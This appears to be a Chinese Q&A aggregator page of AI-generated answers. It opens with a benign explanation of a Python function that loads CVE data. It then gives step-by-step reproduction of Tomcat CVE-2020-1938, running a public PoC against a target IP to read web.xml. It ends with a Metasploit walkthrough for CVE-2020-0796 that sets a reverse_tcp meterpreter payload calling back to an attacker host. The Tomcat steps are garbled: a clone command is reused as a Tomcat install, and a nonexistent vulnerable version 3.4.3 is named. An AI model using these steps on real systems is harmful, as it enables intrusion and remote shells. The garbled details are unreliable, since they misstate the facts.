def get_cve_data(project_type="java"): cve_data = None if project_type == "java": cve_data = getattr(g, '_java_cve_data', None) if cve_data is None: with open(java_vul_fixing_file) as fin: cve_data = g._java_cve_data = json.load(fin) elif project_type == "c": cve_data = getattr(g, '_c_cve_data', None) if cve_data is None: with open(c_vul_fixing_file) as fin: cve_data = g._c_cve_data = json.load(fin) return cve_data
时间: 2024-04-13 17:27:24 浏览: 16
这段代码定义了一个名为 `get_cve_data` 的函数,用于获取特定项目类型的 CVE 数据。函数接受一个可选的参数 `project_type`,默认值为 `"java"`。
函数首先定义了一个变量 `cve_data` 并将其初始化为 `None`。然后,根据 `project_type` 的值,它会从全局对象 `g` 中获取对应项目类型的 CVE 数据。如果 `cve_data` 为 `None`,则说明还没有加载过该项目类型的数据,函数会从相应的文件中读取 JSON 数据,并将其保存到 `g` 对象中。
最后,函数返回获取到的 CVE 数据。
这段代码假设在全局对象 `g` 中存在用于存储 Java 和 C 项目的 CVE 数据的属性 `_java_cve_data` 和 `_c_cve_data`。它还假设有两个文件路径 `java_vul_fixing_file` 和 `c_vul_fixing_file` 分别指向存储 Java 和 C 项目的 CVE 数据的 JSON 文件。
你可以根据需要,修改文件路径和属性名称以适应你的代码结构和数据存储方式。
相关问题
Tomact_CVE-2020-1938漏洞复现
要复现Tomact_CVE-2020-1938漏洞,可以按照以下步骤进行操作:
1. 下载POC:可以使用以下命令下载POC文件:
git clone https://github.com/sv3nbeast/CVE-2020-1938-Tomact-file_include-file_read/
2. 在攻击机上搭建环境:确保攻击机上已经安装了Tomcat服务器,并且版本在3.4.3以下,可以使用以下命令下载并安装Tomcat 3.4.3版本:
git clone https://github.com/sv3nbeast/CVE-2020-1938-Tomact-file_include-file_read/
3. 配置Tomcat服务器:在Tomcat安装目录下,找到server.xml文件,在<Connector>标签中添加以下内容:
protocol="org.apache.coyote.ajp.AjpNio2Protocol" secretRequired="false"
4. 启动Tomcat服务器:在Tomcat安装目录下运行启动脚本,如./catalina.sh run
5. 复现漏洞:使用以下命令触发漏洞复现:
python3 file_include.py -u http://目标IP:目标端口/ -p /WEB-INF/web.xml
以上步骤可以帮助你复现Tomact_CVE-2020-1938漏洞。请注意,在进行漏洞复现时务必遵守道德规范,并获得合法授权进行测试。<span class="em">1</span><span class="em">2</span><span class="em">3</span>
#### 引用[.reference_title]
- *1* *3* [CVE-2020-1938 漏洞复现](https://blog.csdn.net/weixin_48799157/article/details/124889366)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"]
- *2* [CVE-2020-1938 Tomcat文件包含漏洞复现](https://blog.csdn.net/qq_49279082/article/details/129018726)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"]
[ .reference_list ]
msf win10漏洞_永恒之黑:CVE20200796漏洞复现
这不是一个问题,而是一个主题。如果您想要了解如何复现 CVE-2020-0796(也称为“永恒之黑”漏洞),我可以为您提供一些指导。
首先,您需要具备一定的渗透测试技能和经验,因为该漏洞需要进行端口扫描、漏洞利用等操作,属于比较高级的渗透测试技术。
其次,您需要准备好相应的工具和环境,比如Metasploit框架、Kali Linux等,以及目标机器的Windows 10操作系统。
最后,您可以按照以下步骤进行CVE-2020-0796漏洞的复现:
1. 扫描目标机器,查看是否存在SMBv3漏洞。您可以使用nmap等工具进行扫描。
2. 使用Metasploit框架中的“exploit/windows/smb/cve_2020_0796_poc”模块进行漏洞利用。该模块可以通过以下命令进行设置:
set RHOSTS [目标IP地址]
set RPORT 445
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST [攻击机IP地址]
3. 运行exploit命令,进行漏洞利用。
请注意,上述操作仅供学习和研究目的,不得用于非法攻击和侵犯他人隐私。